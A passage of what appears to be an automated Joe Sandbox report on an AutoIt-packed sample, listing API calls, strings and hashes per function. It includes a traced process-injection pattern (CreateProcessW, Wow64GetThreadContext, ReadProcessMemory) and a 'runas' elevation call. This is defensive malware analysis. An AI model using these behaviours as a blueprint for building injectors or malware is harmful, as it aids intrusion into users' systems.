CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C371

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64_fseek_wcscpy
String ID:
API String ID: 3728024260-0
Opcode ID: e17e2586fb510ba94bbf94a18978d21180dfc0c677eac37f5072ae97bcd6c232
Instruction ID: 294f937189edfae4b9bf51c25c778f01183e24cab08a802892c5d1a7903b460b
Opcode Fuzzy Hash: e17e2586fb510ba94bbf94a18978d21180dfc0c677eac37f5072ae97bcd6c232
Instruction Fuzzy Hash: 30C12CB1900219AFDF15DF99CC81EDEB7BDEF49300F1081AAF609E6151DB709A848F65

Function 008C3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 008C37B3
KillTimer.USER32(?,00000001), ref: 008C37DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C3800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C380B
CreatePopupMenu.USER32 ref: 008C381F
PostQuitMessage.USER32(00000000), ref: 008C382E

Strings

TaskbarCreated, xrefs: 008C3806

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bde94c07dd96bd345864dfbb29788abb48d8d6eedeb18153820a0b51298ede3d
Instruction ID: 7a7a8955fea781722dc773c834f0973025fc9a40e5264f5461e07f537ca163b8
Opcode Fuzzy Hash: bde94c07dd96bd345864dfbb29788abb48d8d6eedeb18153820a0b51298ede3d
Instruction Fuzzy Hash: 8D41F7F511824D6BDB246F689C49F7936B9F705305F00813DF902D62A1CA70DD43A762

Function 008C3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008C3E79
LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
LoadIconW.USER32(00000063), ref: 008C3E9E
LoadIconW.USER32(000000A4), ref: 008C3EB0
LoadIconW.USER32(000000A2), ref: 008C3EC2

Part of subcall function 008C4024: LoadImageW.USER32(008C0000,00000063,00000001,00000010,00000010,00000000), ref: 008C4048

RegisterClassExW.USER32(?), ref: 008C3F30

Part of subcall function 008C3F53: GetSysColorBrush.USER32(0000000F), ref: 008C3F86
Part of subcall function 008C3F53: RegisterClassExW.USER32(00000030), ref: 008C3FB0
Part of subcall function 008C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
Part of subcall function 008C3F53: InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
Part of subcall function 008C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
Part of subcall function 008C3F53: LoadIconW.USER32(000000A9), ref: 008C4004
Part of subcall function 008C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013

Strings

#, xrefs: 008C3F09
0, xrefs: 008C3F02
AutoIt v3, xrefs: 008C3F1F

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
Instruction ID: 1bb2aa12f2367ae7e2d37af74ab0bb91376df47a4300b254413caf2532bff668
Opcode Fuzzy Hash: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
Instruction Fuzzy Hash: 402162B4D18304ABCB14DFA9EC49B9DBFF9FB48710F00812AE604A33A0D7754645AF91

Function 015D25C8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015D2699
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015D28BF

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 36244b35f9bd9de2c0a80dce6c71357bf84084add61beb027c1e11ba46b4a624
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: BDA12B74E04209EBDB24CFA8C899BEEBBB5FF48304F208559E601BB280D7759A41CF54

Function 008DDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?,00000000), ref: 008DDDEC
GetCurrentProcess.KERNEL32(00000000,0095DC38,?,?), ref: 008DDEAC
GetNativeSystemInfo.KERNELBASE(?,0095DC38,?,?), ref: 008DDF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF1F
GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF29
GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF35

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
Instruction ID: 2b530d6d4b6b8889aad72feff0fa7b2e11e276931a75e2b4c5a48c1abefeb215
Opcode Fuzzy Hash: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
Instruction Fuzzy Hash: DF61B1B180A384CBCF15CFA898C15E97FB4BF2A304F194AD9D8459F307C624C909CB66

Function 008C3D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008C3DC8

Part of subcall function 008C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3DEE,00981148,?), ref: 008C6471

SetCurrentDirectoryW.KERNEL32(?), ref: 008C3E48
SetCurrentDirectoryW.KERNEL32(?,00981148,?), ref: 00931D06
GetForegroundWindow.USER32(runas,?,?,?,?,?,0095DAB4,00981148,?), ref: 00931D89
ShellExecuteW.SHELL32(00000000,?,?,0095DAB4,00981148,?), ref: 00931D90

Part of subcall function 008C3E6E: GetSysColorBrush.USER32(0000000F), ref: 008C3E79
Part of subcall function 008C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
Part of subcall function 008C3E6E: LoadIconW.USER32(00000063), ref: 008C3E9E
Part of subcall function 008C3E6E: LoadIconW.USER32(000000A4), ref: 008C3EB0
Part of subcall function 008C3E6E: LoadIconW.USER32(000000A2), ref: 008C3EC2
Part of subcall function 008C3E6E: RegisterClassExW.USER32(?), ref: 008C3F30

Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 008C36E6
Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
Part of subcall function 008C36B8: ShowWindow.USER32(00000000), ref: 008C371B
Part of subcall function 008C36B8: ShowWindow.USER32(00000000), ref: 008C3724

Part of subcall function 008C4FFC: _memset.LIBCMT ref: 008C5022
Part of subcall function 008C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB

Strings

runas, xrefs: 00931D84

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Window$IconLoad$CreateCurrentDirectoryFullNamePathShow$BrushClassColorCursorExecuteForegroundNotifyRegisterShellShell__memset
String ID: runas
API String ID: 4126474716-4000483414
Opcode ID: 8b359dd0f718c7d9cafdf246dcb673a7a48fafdf50251d5a8320dbf10ee21ca7
Instruction ID: 814031b9b96593c6439f22213392567ed7c3a1b66a3ae80bc3cf986dfff46f6d
Opcode Fuzzy Hash: 8b359dd0f718c7d9cafdf246dcb673a7a48fafdf50251d5a8320dbf10ee21ca7
Instruction Fuzzy Hash: 7231B331D0C248AACF11BBF4DC49FED7B79FB56704F04806DE501E22A2DA349646DB22

Function 008C49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009341DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093421A
RegCloseKey.ADVAPI32(?), ref: 00934249

Strings

Include, xrefs: 009341D3, 00934212
Software\AutoIt v3\AutoIt, xrefs: 008C4A13

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
Instruction ID: a238ff293be5e1c2cff73e321bfafd010b48a48dd068d263a9572c21243c7178
Opcode Fuzzy Hash: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
Instruction Fuzzy Hash: D4117C75A01108BFEB10EBA8CD86EBF7BBCEF15344F000069B506E7191EA70AE45EB50

Function 008C406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008C449E,?,?,00000000,00000001), ref: 008C407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C449E,?,?,00000000,00000001), ref: 008C4092
LoadResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F1A
SizeofResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F2F
LockResource.KERNEL32(008C449E,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB,00000000), ref: 00934F42

Strings

SCRIPT, xrefs: 008C4088

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
Instruction ID: 2f8c994475a7911e5f45ed093877f04676c22071eec8a4c45e4ecaec98dadd00
Opcode Fuzzy Hash: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
Instruction Fuzzy Hash: 55113C79244B01BFE7218B65EC58F277BB9EBC6B51F14816CF612D62A0DBB1DC409A20

Function 008C36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 008C36E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
ShowWindow.USER32(00000000), ref: 008C371B
ShowWindow.USER32(00000000), ref: 008C3724

Strings

AutoIt v3, xrefs: 008C36DE, 008C36E3, 008C36E4
edit, xrefs: 008C3701

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
Instruction ID: 3af0a55d30ae2792598822bdf19b0e32b36212e974d7c646d1b50813e13a8971
Opcode Fuzzy Hash: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
Instruction Fuzzy Hash: 0FF0DA755692D07AEB315B57AC08E672E7DD7C7F24B00001AFA04A62B0C5654896FBB1

Function 015D2378 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 015D2268: Sleep.KERNELBASE(000001F4), ref: 015D2279

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015D24A1

Strings

CZRTSJVDO0NQ5N3HDH, xrefs: 015D2521, 015D2524

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: CreateFileSleep
String ID: CZRTSJVDO0NQ5N3HDH
API String ID: 2694422964-1444722434
Opcode ID: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
Instruction ID: b22896d60fc39fcea8daa370e8ceed325e3b7b39d5224c948a03a6da96aa32e5
Opcode Fuzzy Hash: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
Instruction Fuzzy Hash: 0151A371D04249DBEF21DBB8C854BEEBB75AF59300F004599E609BB2C0D7B90B45CBA6

Function 008C51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 008C522F
_wcscpy.LIBCMT ref: 008C5283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00933CB0

Strings

Line: , xrefs: 00933CD9

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
Instruction ID: dbf9240cd49e75edf236320cd6b82cb58e42de3c39f25bb10a0293477ce6d395
Opcode Fuzzy Hash: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
Instruction Fuzzy Hash: EE31BC71018740AAD720EB64EC46FDAB7ECFB84314F00851EF599D2191EB70E6899B93

Function 015D0A88 Relevance: 7.8, APIs: 5, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd82d117be06ff4691dcfeba997aa306b3c4575ab71b08bf84a3cc4a5e9333f
Instruction ID: f6eccd92d4b3f356159fdcf6e55b59ff4b495da4895d8bc4931fb5f1de261151
Opcode Fuzzy Hash: 6bd82d117be06ff4691dcfeba997aa306b3c4575ab71b08bf84a3cc4a5e9333f
Instruction Fuzzy Hash: FFD11214A24648D6EB20DFB4D854BDEB232FF68700F10956DA10DEB3D4E77A4E41CB5A

Function 008C4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 008C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00981148,?,008C61FF,?,00000000,00000001,00000000), ref: 008C5392

Part of subcall function 008C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D

_wcscat.LIBCMT ref: 00932D80
_wcscat.LIBCMT ref: 00932DB5

Strings

\, xrefs: 00932DA2
\Include\, xrefs: 008C4B0A

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
Instruction ID: 3cf93e182fdbcaa5dd01e19a029ff29a1ab2cdbea9f238a58fcc90ca8d680163
Opcode Fuzzy Hash: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
Instruction Fuzzy Hash: FD51807142C3409BC714EF59D9899AAB7F8FF59300B60492EF649C33A1EB70DA48DB52

Function 008E34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 008E34FE

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 008E3539
__wopenfile.LIBCMT ref: 008E3549

Strings

<G, xrefs: 008E34CD, 008E34F0, 008E34FC

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
Instruction ID: 438bf7bf56a7f5b3966be92110180d7a59ee38596d5456416814d0b0a9cd7212
Opcode Fuzzy Hash: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
Instruction Fuzzy Hash: F411E771A00286AEDB12BF7B8C4266E36E4FF57354F148425E815DB2C1EB34CE1197A2

Function 008DD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008DD28B,SwapMouseButtons,00000004,?), ref: 008DD2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2DD
RegCloseKey.KERNELBASE(00000000,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2FF

Strings

Control Panel\Mouse, xrefs: 008DD2BA

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
Instruction ID: d947536b1c32946b500af36f98c0aa9641333408d443020a408800c89d879269
Opcode Fuzzy Hash: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
Instruction Fuzzy Hash: FA113979615308BFDB248FA8CC84EAF7BB8FF45744F10456AE805D7210E631AE41AB60

Function 015D1268 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 015D1A23
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015D1AB9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015D1ADB

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: b64e4ba155c4134e70ded5d3878501ca62de324d835d8b2e9c2dac0a8ae23160
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: 22620A70A146189BEB24DFA8C840BDEB776FF58300F1091A9D10DEB394E7759E81CB59

Function 0090C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F

Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670

_free.LIBCMT ref: 0090C4DD
_free.LIBCMT ref: 0090C4E4
_free.LIBCMT ref: 0090C54F

Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3

_free.LIBCMT ref: 0090C557

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

